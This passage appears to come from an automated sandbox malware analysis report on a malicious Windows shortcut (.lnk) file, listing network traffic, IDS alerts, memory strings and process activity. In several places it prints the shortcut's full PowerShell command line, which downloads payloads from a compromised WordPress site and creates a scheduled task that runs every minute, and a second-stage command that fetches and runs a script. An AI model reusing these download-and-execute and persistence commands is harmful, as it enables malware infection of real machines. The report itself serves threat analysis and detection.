        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
        Host: www.italialife24.it
      Source: Joe Sandbox View | ASN Name: SERVERPLAN-ASIT SERVERPLAN-ASIT
      Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
      Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 46.254.34.201:443
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: www.italialife24.it
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: www.italialife24.it
        Connection: Keep-Alive
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/triazoicuTsQo.php HTTP/1.1
        Host: www.italialife24.it
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/butterfliesxH2dz.php HTTP/1.1
        Host: www.italialife24.it
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: www.italialife24.it
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /wp-content/uploads/2021/05/afretPf.php HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
        Host: www.italialife24.it
        Connection: Keep-Alive
      Source: global traffic | DNS traffic detected: DNS query: www.italialife24.it
      Source: powershell.exe, 0000000C.00000002.2448566614.000001E7F081A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microsc
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://italialife24.it
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED21000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2D3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B33C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFB3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D992C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.italialife24.it
      Source: powershell.exe, 00000000.00000002.1726859837.0000017399C81000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAE561000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D8351000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38ED49000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: powershell.exe, 0000000C.00000002.2338825449.000001E7D9BCF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D94AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B5A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9E36000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746150343.00000173A9CF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE716000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFF2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1867271465.0000026ABE5DF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9C2A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E84FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2433524992.000001E7E83BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B3E3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAFBA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9998000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
      Source: powershell.exe, 00000000.00000002.1726859837.000001739B2CF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739AE1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726859837.000001739B31C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1800546723.0000026AAF18B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2338825449.000001E7D9694000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it
      Source: wscript.exe, 00000007.00000002.1828005785.0000025EDB425000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000F.00000002.2361827669.000001D1B0A15000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2900184300.000001F38F1A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-c
      Source: wscript.exe, wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content
      Source: wscript.exe, 0000000B.00000002.2305543593.0000017912415000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/0
      Source: wscript.exe, 00000011.00000002.2890351508.00000204119D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/a
      Source: powershell.exe, 00000012.00000002.2900184300.000001F38ED83000.00000004.00000800.00020000.00000000.sdmp, evQtmlDaSRMzUk.js.0.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
      Source: powershell.exe, 00000004.00000002.1882204354.0000026AC67F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
      Source: powershell.exe, 00000000.00000002.1750647815.00000173B1DDB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726429483.0000017397D8E000.00000004.00000020.00020000.00000000.sdmp, G9eWTvswoH.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
      Source: powershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
      Source: wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
      Source: powershell.exe, 00000000.00000002.1750647815.00000173B1DDB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1726429483.0000017397D8E000.00000004.00000020.00020000.00000000.sdmp, G9eWTvswoH.lnkString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
      Source: powershell.exe, 00000000.00000002.1726668334.0000017397EE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
      Source: wscript.exe, 0000000F.00000002.2361872943.000001D1B2500000.00000004.00000020.00020000.00000000.sdmp, V58W09DALJEK.js.4.drString found in binary or memory: https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49887
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown | Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49887 -> 443
Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 46.254.34.201:443 -> 192.168.2.4:49887 version: TLS 1.2

      System Summary

Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
Source: G9eWTvswoH.lnk | LNK file: -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: Process Memory Space: powershell.exe PID: 7332, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winLNK@24/13@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3052:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhporkgo.4ci.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: G9eWTvswoH.lnk | ReversingLabs: Detection: 45%
Source: G9eWTvswoH.lnk | Virustotal: Detection: 45%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php'); $OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js'); schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js ' * 2)) /tn ZA3XqiywQ;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi 'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js "
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
